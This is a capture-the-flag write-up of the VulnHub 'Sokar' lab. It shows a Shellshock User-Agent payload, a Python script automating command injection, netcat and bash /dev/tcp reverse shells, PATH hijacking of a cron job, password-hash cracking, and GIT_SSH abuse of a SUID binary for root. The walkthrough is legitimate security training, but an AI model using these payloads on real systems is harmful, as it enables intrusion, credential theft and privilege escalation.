arkanoid-sokar solution

Post on 15-Jul-2015






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Sokar 1 - Hacking Challenge 1

Vulnhub Hacking Challenge


By arkanoid aka Manos Gavriil

Email: (

Soundtrack: Armin Van Buuren - A State Of Trance

Drinks: Jack Daniels, Red Bull, Coffee


Sokar 1 - Hacking Challenge 2

This was the first competition in 2015 for Vulnhub. Rasta Mouse has developed a great and

realistic game. Congrats for that interesting challenge! I managed to solve this challenge

although at last minute and here is what I did.

Phase I – Find the way to the gate

First thing was to add the IP address of the sokar machine to /etc/hosts. arkanoid@debian:~$ sudo nano /etc/hosts

[sudo] password for arkanoid: localhost sokar

Let’s go port scanning. A default port scan returned nothing. So I did a full port scan at sokar:

arkanoid@debian:~$ nmap –p1-65535 sokar -PN

Starting Nmap 6.00 ( ) at 2015-02-21 12:47 EET

Nmap scan report for sokar (

Host is up (0.00062s latency).


591/tcp open http-alt

And what I got at this port? A visit showed a web server with system stats and nothing more.

Sokar 1 - Hacking Challenge 3

Source code revealed though something interesting.

There was a script that was getting the stats. I tried some nasty things on cat script without any

success when I remembered the panic of security experts over Shellshock computer bug! arkanoid@debian:~$ wget -U "() { test;};echo \"Content-type: text/plain\";

echo; echo; /usr/bin/id" http://sokar:591/cgi-bin/cat ; cat cat

--2015-02-21 12:18:26-- http://sokar:591/cgi-bin/cat

Connecting to sokar:591... connected.

HTTP request sent, awaiting response... 200 OK

Length: unspecified [text/plain]

Saving to: `cat'

[ <=>

] 49 --.-K/s in 0.004s

2015-02-21 12:18:26 (11.4 KB/s) - `cat' saved [49]

uid=48(apache) gid=48(apache) groups=48(apache)


Boom! I could execute commands on server as apache user. It was time to get a remote shell. As I had to run many commands to achieve this, I wrote a dirty python script that could help me

even the output wasn’t exactly what I was expecting :-P (no time for debugging).

Sokar 1 - Hacking Challenge 4

arkanoid@debian:~$ cat

#!/usr/bin/env python

import sys

import urllib2

cmd = '() { :; };echo "Content-Type:text/plain";echo;echo;'+ str(sys.argv[1])

url = "http://sokar:591/cgi-bin/cat"

req = urllib2.Request(url)

req.add_header('User-Agent', cmd)

resp = urllib2.urlopen(req)

data =

for line in data:

print line,

I thought this was going to be easy…but I shouldn’t have underestimated the power of sokar! I tried to get a reverse connect back shell with metepreter (the easy way but no luck). Then I tried

the old school methods with netcat. Luckily netcat was already there!

arkanoid@debian:~$ python '/usr/bin/whereis nc'

n c : / u s r / b i n / n c / u s r / s h a r e / m a n / m a n 1 / n c .

1 . g z

This would be a piece of cake (I thought). Old school hacking!

arkanoid@debian:~$ nc -nvlp 4444

Listening on [] (family 0, port 4444)

Fire up! arkanoid@debian:~$ python '/usr/bin/nc -e /bin/sh 4444'

Waiting for my shell...and waiting…and then I tried also socket binding on other ports as well

but I was keep waiting and waiting and I almost heard the laugh of sokar at some point. Ok

probably the firewall was blocking all connections. So I started to search for more at system. I found out that there were some users on sokar.

arkanoid@debian:~$ python '/usr/bin/cut -d: -f1 /etc/passwd'

r o o t

b i n

d a e m o n

a d m

l p

s y n c

s h u t d o w n

h a l t

m a i l

u u c p

o p e r a t o r

Sokar 1 - Hacking Challenge 5

g a m e s

g o p h e r

f t p

n o b o d y

v c s a

s a s l a u t h

p o s t f i x

s s h d

b y n a r r

a p a c h e

a p o p h i s

After a lot of searching, I finally found that I was able to read bynarr’s mails. arkanoid@debian:~$ python '/bin/cat /var/spool/mail/bynarr'

R e t u r n - P a t h : < r o o t @ s o k a r >

D e l i v e r e d - T o : b y n a r r @ l o c a l h o s t

R e c e i v e d : f r o m r o o t b y l o c a l h o s t

T o : < b y n a r r @ s o k a r >

D a t e : T h u , 1 3 N o v 2 0 1 4 2 2 : 0 4 : 3 1 + 0 1 0 0

S u b j e c t : W e l c o m e

D e a r B y n a r r . W e l c o m e t o S o k a r I n c . F o r

e n s i c D e v e l o p m e n t T e a m .

A u s e r a c c o u n t h a s b e e n s e t u p f o r y o u .

U I D 5 0 0 ( b y n a r r )

G I D 5 0 0 ( b y n a r r )

5 0 1 ( f o r e n s i c )

P a s s w o r d ' f r u i t y ' . P l e a s e c h a n g e t h i s

A S A P .

S h o u l d y o u r e q u i r e , y o u ' v e b e e n g r a n t e d

o u t b o u n d e p h e m e r a l p o r t a c c e s s o n 5 1 2 4 2

, t o t r a n s f e r n o n - s e n s i t i v e f o r e n s i c d u

m p s o u t f o r a n a l y s i s .

A l l t h e b e s t i n y o u r n e w r o l e !

- S o k a r -

AAA nice! A password and a port access! That should be the port that I am trying to connect! But again no! I didn’t have the privileges of bynnar. I was still apache. I had to try something

different. After a lot of tries I realized that inside the /tmp/ directory the stats file was keep

refreshing. That could mean that a cron job with the privileges of bynarr might run. arkanoid@debian:~$ python '/bin/ls -lh /tmp/'

t o t a l 4 . 0 K

- r w - r w - r - - 1 b y n a r r b y n a r r 1 . 3 K F e b 2 1

1 1 : 4 2 s t a t s

Sokar 1 - Hacking Challenge 6

In order to get the stats I figured out that iostat command was also running from cron job. I

search for env vulnerabilities inside bynarr home directory and indeed there was one:

arkanoid@debian:~$ python '/bin/cat /home/bynarr/.bash_profile'


#Get the aliases and functions




#User specific environment and startup programs


Export PATH

I could possibly replace the iostat command from /usr/bin to local home directory. So I made a

shell like the following using echo command. As netcat for some reason couldn’t work I tried the bash method!

arkanoid@debian:~$ python '/bin/echo "#!/bin/bash" >


arkanoid@debian:~$ python '/bin/echo "/bin/bash -i >&

/dev/tcp/ 0>&1" >> /home/bynarr/iostat'

arkanoid@debian:~$ python '/bin/chmod +x /home/bynarr/iostat'

And FINALLY! I got a damn shell and at the same time I was bynarr!

arkanoid@debian:~$ nc -nvlp 51242

Listening on [] (family 0, port 51242)

Connection from [] port 51242 [tcp/*] accepted (family 2, sport


bash: no job control in this shell

[bynarr@sokar ~]$ id


uid=500(bynarr) gid=501(bynarr) groups=501(bynarr),500(forensic)

[bynarr@sokar ~]$

The nice part is that it is kind of persistent as the cron job runs every minute iostat again.

Sokar 1 - Hacking Challenge 7

Phase II – Attacking apophis In the home directory of bynarr I could find a nice script tool called lime which it could extract

memory from the system. [bynarr@sokar ~]$ ls





[bynarr@sokar ~]$ cat lime

cat lime


echo """


Linux Memory Extractorator



echo "LKM, add or remove?"

echo -en "> "

read -e input

if [ $input == "add" ]; then

/sbin/insmod /home/bynarr/lime.ko "path=/tmp/ram format=raw"

elif [ $input == "remove" ]; then

/sbin/rmmod lime


echo "Invalid input, burn in the fires of Netu!"


[bynarr@sokar ~]$

I tried to execute it but it was obvious that I couldn’t because it was trying to read lime.ko which

had permissions only for root. [bynarr@sokar ~]$ ./lime



Linux Memory Extractorator


LKM, add or remove?

> add

insmod: can't read '/home/bynarr/lime.ko': Permission denied

[bynarr@sokar ~]$ ls -lh

ls -lh

Sokar 1 - Hacking Challenge 8

total 20K

-rwxr-xr-x 1 apache apache 101 Feb 21 12:20 iostat

-rwxr-xr-x 1 root root 368 Jan 27 19:14 lime

-rw------- 1 root root 11K Nov 13 11:45 lime.ko

[bynarr@sokar ~]$

Soon I find out that user bynarr can execute with sudo and with no need for password. [bynarr@sokar ~]$ sudo -l

sudo -l

Matching Defaults entries for bynarr on this host:

!requiretty, visiblepw, always_set_home, env_reset, env_keep="COLORS







User bynarr may run the following commands on this host:

(ALL) NOPASSWD: /home/bynarr/lime

After execution a memory dump file (256MB) was created at /tmp/ directory. I used strings and

grep to filter out useful information and I got apophis password hash somewhere:

[bynarr@sokar tmp]$ /usr/bin/strings ram | grep -i apophis

/usr/bin/strings ram | grep -i apophis




<------cut it --------->

type=CRED_DISP msg=audit(1424508240.012:16): user pid=1003 uid=0 auid=501

ses=2 msg='op=PAM:setcred acct="apophis" exe="/bin/login" hostname=? addr=?

terminal=tty1 res=success'

type=USER_END msg=audit(1424508240.014:17): user pid=1003 uid=0 auid=501

ses=2 msg='op=PAM:session_close acct="apophis" exe="/bin/login" hostname=?

addr=? terminal=tty1 res=success'




type=USER_AUTH msg=audit(1424508199.337:10): user pid=1003 uid=0


John made his job again:

arkanoid@debian:~$ john --wordlist=./rockyou.txt sokarpass.txt Loaded 1 password hash (crypt, generic crypt(3) [?/64]) Press 'q' or Ctrl-C to abort, almost any other key for status overdrive (apophis) 1g 0:00:01:40 100% 0.009942g/s 365.5p/s 365.5c/s 365.5C/s puccaygaru..love6969 Use the "--show" option to display all of the cracked passwords reliably Session completed

Sokar 1 - Hacking Challenge 9

In order to login as apophis I had to use a tty. A nice python trick did the job.

[bynarr@sokar tmp]$ su apophis

su apophis

standard in must be a tty

[bynarr@sokar tmp]$ python -c ‘import pty; pty.spawn(“/bin/sh”)’

python -c ‘import pty; pty.spawn(“/bin/sh”)’

bash: syntax error near unexpected token `“/bin/sh”'

[bynarr@sokar tmp]$ python -c 'import pty; pty.spawn("/bin/sh")'

python -c 'import pty; pty.spawn("/bin/sh")'

sh-4.1$ su apophis

su apophis

Password: overdrive

[apophis@sokar tmp]$ cd


[apophis@sokar ~]$ id


uid=501(apophis) gid=502(apophis) groups=502(apophis)

Celebration! I was apophis!

Meanwhile...It was already too late and it was time for some whiskey:

Sokar 1 - Hacking Challenge 10

Phase III – Attacking root This was rather a very difficult part for most players I guess. Under the

directory of apophis there was a SUID program called build with GIT repo functionally. Soon I understood from the errors I was receiving while

executing it that I had to fix things in order to make it work. Exploitation was

hard and I tried a lot of things. I got into also debugging in order to fully

understand the program. I downloaded the program locally so I could study it better. I found all functions of the program and I also tried step by step

execution of them with GDB in order to find any weakness. Finally I tried to

exploit it using environment variables of user apophis. At there was the key!

One thing that needed fix was the SSH connection try to sokar-dev. Program couldn’t correctly

resolve sokar-dev. So I added a record of my nameserver in /etc/resolv.conf and I also used dnsmasq back to my machine in order to mask sokar-dev to my IP address:

[apophis@sokar ~]$ more /etc/resolv.conf

more /etc/resolv.conf


Now I could download files from my local pc to sokar. The program run as follows:

[apophis@sokar ~]$ ./build


Build? (Y/N) Y


Cloning into '/mnt/secret-project'...

root@sokar-dev's password:

remote: Counting objects: 3, done.

remote: Compressing objects: 100% (2/2), done.

remote: Total 3 (delta 0), reused 0 (delta 0)

Receiving objects: 100% (3/3), 103.88 KiB | 0 bytes/s, done.

Checking connectivity... done.

[apophis@sokar ~]$

I spotted a buffer overflow as well but this was way too hard. Especially with the use of Canary:

arkanoid@debian:~ $ ./ --file ./build RELRO STACK CANARY NX PIE RPATH RUNPATH FILE No RELRO Canary found NX disabled PIE enabled No RPATH No RUNPATH ./build

Sokar 1 - Hacking Challenge 11

How did I found the command in order to correct setup the settings above? Back to gdb for all

the functions:

(gdb) info functions

info functions

All defined functions:

Non-debugging symbols:

0x0000000000000708 _init

0x0000000000000730 __printf_chk

0x0000000000000730 __printf_chk@plt

0x0000000000000740 __libc_start_main

0x0000000000000740 __libc_start_main@plt

0x0000000000000750 system

0x0000000000000750 system@plt

0x0000000000000760 __gets_chk

0x0000000000000760 __gets_chk@plt

0x0000000000000770 __cxa_finalize

0x0000000000000770 __cxa_finalize@plt

0x0000000000000780 __stack_chk_fail

0x0000000000000780 __stack_chk_fail@plt

0x0000000000000790 strcmp

0x0000000000000790 strcmp@plt

0x00000000000007a0 setreuid

0x00000000000007a0 setreuid@plt

0x00000000000007b0 _start

0x00000000000007dc call_gmon_start

0x0000000000000800 __do_global_dtors_aux

0x0000000000000880 frame_dummy

0x00000000000008ac encryptDecrypt

0x00000000000008ef main

0x0000000000000a80 __libc_csu_fini

0x0000000000000a90 __libc_csu_init

0x0000000000000b20 __do_global_ctors_aux

0x0000000000000b58 _fini


Function encryptDecrypt was quite interesting and encrypted text could be found. (gdb) b encryptDecrypt

b encryptDecrypt

Breakpoint 1 at 0x8ac

(gdb) r


Starting program: /home/apophis/build

Build? (Y/N) Y


Breakpoint 1, 0x00007f763bf1a8ac in encryptDecrypt ()

Missing separate debuginfos, use: debuginfo-install glibc-2.12-


(gdb) x/1s $rdi

x/1s $rdi

0x7fff7029ae80: "f<:;f+ 'f. =i*%&',i::!sff;&&=\t:&\"(;d-


Sokar 1 - Hacking Challenge 12

(gdb) disas encryptDecrypt

disas encryptDecrypt

Dump of assembler code for function encryptDecrypt:

=> 0x00007f763bf1a8ac <+0>: mov %rdi,%rdx

0x00007f763bf1a8af <+3>: mov $0x0,%r9d

0x00007f763bf1a8b5 <+9>: mov $0xffffffffffffffff,%r11

0x00007f763bf1a8bc <+16>: mov %rdi,%r10

0x00007f763bf1a8bf <+19>: mov $0x0,%eax

0x00007f763bf1a8c4 <+24>: jmp 0x7f763bf1a8d6 <encryptDecrypt+42>

0x00007f763bf1a8c6 <+26>: movzbl (%rdx,%r8,1),%ecx

0x00007f763bf1a8cb <+31>: xor $0x49,%ecx

0x00007f763bf1a8ce <+34>: mov %cl,(%rsi,%r8,1)

0x00007f763bf1a8d2 <+38>: add $0x1,%r9d

0x00007f763bf1a8d6 <+42>: movslq %r9d,%r8

0x00007f763bf1a8d9 <+45>: mov %r11,%rcx

0x00007f763bf1a8dc <+48>: mov %r10,%rdi

0x00007f763bf1a8df <+51>: repnz scas %es:(%rdi),%al

0x00007f763bf1a8e1 <+53>: not %rcx

0x00007f763bf1a8e4 <+56>: sub $0x1,%rcx

0x00007f763bf1a8e8 <+60>: cmp %rcx,%r8

0x00007f763bf1a8eb <+63>: jb 0x7f763bf1a8c6 <encryptDecrypt+26>

0x00007f763bf1a8ed <+65>: repz retq

End of assembler dump.


It seems that is XORING the string with character 0x49 which is a capital I. The encrypted

string can be also found from the strings inside the binary build file. So I XORed again and I got the following cleartext which can also be identified before the system function execution:

(gdb) b system

b system

Breakpoint 2 at 0x7f763b9a28f0

(gdb) c



Breakpoint 2, 0x00007f763b9a28f0 in system () from /lib64/

(gdb) x/1s $rdi

x/1s $rdi

0x7fff7029ae20: "/usr/bin/git clone ssh://root@sokar-dev:/root/secret-

project /mnt/secret-project/"


Of course the easiest way is with the command strace –f ./build. That cleartext

is where I lost my sleep. It seems though that was quite easy. The key was in

front of my eyes. After many tries I found out a nice environmental variable

called GIT_SSH. GIT_SSH, if specified, is a program that is invoked instead of SSH when GIT tries to connect to an SSH host. With that in mind it was

easy. I could export the variable to point to my program.

Note: “It won’t support extra command-line parameters, so you’d have to write

a wrapper script and set GIT_SSH to point to it.”

Sokar 1 - Hacking Challenge 13

I wrote a getroot program and also the script which GIT_SSH would point to.

[apophis@sokar ~]$ cat getroot.c

cat getroot.c

#include <stdio.h>

#include <stdlib.h>

#include <sys/types.h>

int main(){



return 0;


[apophis@sokar ~]$ cat sh

cat sh


chown root:root ./getroot

chmod 4755 ./getroot

[apophis@sokar ~]$


[apophis@sokar ~]$ export GIT_SSH=./sh

export GIT_SSH=./sh

[apophis@sokar ~]$ ls -lh getroot

ls -lh getroot

-rwxrwxr-x 1 apophis apophis 6.4K Feb 21 15:41 getroot

[apophis@sokar ~]$ ./build


Build? (Y/N) Y


[apophis@sokar ~]$ ./build


Build? (Y/N) Y


Cloning into '/mnt/secret-project'...

fatal: Could not read from remote repository.

Please make sure you have the correct access rights

and the repository exists.

[apophis@sokar ~]$ ls -lh getroot

ls -lh getroot

-rwsr-xr-x 1 root root 6.4K Feb 21 15:41 getroot

[apophis@sokar ~]$

[apophis@sokar ~]$ ./getroot


sh-4.1# id


uid=0(root) gid=502(apophis) groups=0(root),502(apophis)

sh-4.1# ls /root

ls /root

build.c flag

Sokar 1 - Hacking Challenge 14

cat /root/flag

0 0

| |


0 |~ ~ ~ ~ ~ ~| 0

| | Happy | |



0 | B i r t h d a y | 0

| |/\/\/\/\/\/\/\/\/\/\/\/| |



| |

| V u l n H u b ! ! |

| ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ |



| Congratulations on beating Sokar! |

| |

| Massive shoutout to g0tmi1k and |

| the entire community which makes |

| VulnHub possible! |

| |

| rasta_mouse (@_RastaMouse) |



Keep hacking.

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